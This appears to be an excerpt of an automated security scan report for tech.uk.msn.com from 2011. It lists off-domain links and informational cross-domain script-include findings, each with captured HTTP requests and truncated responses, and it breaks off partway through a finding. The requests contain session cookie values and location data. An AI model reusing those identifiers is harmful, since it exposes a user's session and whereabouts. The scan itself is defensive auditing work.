The page was loaded from a URL containing a query string:http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://digg.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 http://go.microsoft.com/fwlink/?LinkId=74170 http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&sourceurl=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&description=HTC+Salsa http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 http://twitter.com/msntech http://twitter.com/share http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104 http://www.bing.com/maps/ http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104 http://www.bing.com/search?q=Digital+camera&form=MSN104 http://www.bing.com/search?q=HD+Television&form=MSN104 http://www.bing.com/search?q=Laptops&form=MSN104 http://www.bing.com/search?q=internet+explorer+9&form=MSN104 http://www.bing.com/search?q=iphone&form=MSN104 http://www.bing.com/search?q=mobile+broadband&form=MSN104 http://www.bing.com/search?q=windows+phone+7&form=MSN104 http://www.facebook.com/msnuktech http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&labels=HTC+Salsa http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&c=HTC+Salsa http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&h=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.reddit.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.technorati.com/faves?add=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 http://www.techradar.com/ http://www.techradar.com/reviews/phones/mobile-phones/htc-salsa-930923/review http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376424&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fphones%2Farticles.aspx%3Fcp-documentid%3D158307155&lc=2057&id=1184
Request
GET /phones/articles.aspx?cp-documentid=158307155 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/reviews/%2526oid%253Dhttp%25253A//tech.uk.msn.com/phones/articles.aspx%25253Fcp-documentid%25253D158307155%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA28 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:23 GMT ntCoent-Length: 93393 Content-Length: 93393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376424&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fphones%2Farticles.aspx%3Fcp-documentid%3D158307155&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <p class="partnerlogo cf"><a href="http://www.techradar.com"> <img src="http://estb.msn.com/i/D0/DBE287CB873556C222FCAEF931EE2A.gif" width="100" height="40" alt="TechRadar.com (Copyright ..Future Publishing)" />...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <p>See related stories from <a href="http://www.techradar.com/reviews/phones/mobile-phones/htc-salsa-930923/review"> techradar.com</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&labels=HTC+Salsa" title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&sourceurl=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&description=HTC+Salsa" title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&c=HTC+Salsa" title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&h=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <li class="first"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Classic Mobiles</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Laptops&form=MSN104"> Cheap laptops</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=mobile+broadband&form=MSN104"> Mobile broadband</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Digital+camera&form=MSN104"> Digital cameras</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Top Mobile Phones</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=HD+Television&form=MSN104"> HD television</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=windows+phone+7&form=MSN104"> Windows Phone 7</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104"> New Xbox 360</a>...[SNIP]... <li class="bottom llcb"> <a href="http://www.bing.com/search?q=internet+explorer+9&form=MSN104"> Internet Explorer 9</a>...[SNIP]... <li class="last bottom llfn"> <a href="http://www.bing.com/search?q=iphone&form=MSN104"> Iphone 4</a>...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
3. Cross-domain script include
previous
There are 20 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
3.1. http://tech.uk.msn.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET / HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; s_cc=true; s_sq=%5B%5BB%5D%5D; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:37:43 GMT ntCoent-Length: 63794 Content-Length: 63794 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.2. http://tech.uk.msn.com/blog/tech-and-gadgets.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/blog/tech-and-gadgets.aspx
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /blog/tech-and-gadgets.aspx HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/blog/tech-and-gadgets.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:58:00 GMT ntCoent-Length: 63656 Content-Length: 63656 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </script><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.3. http://tech.uk.msn.com/features/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /features/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:48 GMT ntCoent-Length: 63693 Content-Length: 63693 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.4. http://tech.uk.msn.com/features/hands-on-google-chromebook
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/hands-on-google-chromebook
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_GB/all.js http://img.widgets.video.s-msn.com/js/embed.js
Request
GET /features/hands-on-google-chromebook HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/hands-on-google-chromebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA28 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:58:00 GMT ntCoent-Length: 101619 Content-Length: 101619 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... </style><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js" xmlns="http://www.w3.org/1999/xhtml"> </script>...[SNIP]...
3.5. http://tech.uk.msn.com/features/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/photos.aspx
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /features/photos.aspx?cp-documentid=158635065 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/%2526oid%253Dhttp%25253A//tech.uk.msn.com/features/photos.aspx%25253Fcp-documentid%25253D158635065%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA26 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:08 GMT ntCoent-Length: 107907 Content-Length: 107907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.6. http://tech.uk.msn.com/media/articles.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/media/articles.aspx
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
